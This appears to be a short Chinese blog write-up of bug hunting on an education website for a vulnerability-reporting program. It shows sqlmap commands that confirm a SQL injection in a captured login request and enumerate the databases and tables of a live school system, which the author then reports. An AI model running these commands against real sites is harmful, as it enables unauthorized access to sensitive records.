首页 > 编程知识 正文

教育src漏洞挖掘

时间:2023-05-06 18:37:26 阅读:197150 作者:2581

记一次教育src挖洞 fofa搜索了一下,找到一个有sql注入的教育网站漏洞url:http://x.x.x.x:8090/login

fofa搜索了一下,找到一个有sql注入的教育网站

#fofa搜索了一下,找到一个有sql注入的教育完整

漏洞url:http://x.x.x.x:8090/login

打开网站,随便输入数字,用burp抓包,在账号后面加*,保存到1.txt
sqlmap跑,存在sql注入
python sqlmap.py -r 1.txt --level 2


爆数据库
python sqlmap.py -r 1.txt --level 2 --dbs


数据太多了,只能挑几个表跑
python sqlmap.py -r 1.txt --level 2 --tables -D “examxx,mysql,yxzs-jxjsxy”
数据敏感,直接提交教育,第二天就可以拿到教育src邀请码

版权声明:该文观点仅代表作者本人。处理文章:请发送邮件至 三1五14八八95#扣扣.com 举报,一经查实,本站将立刻删除。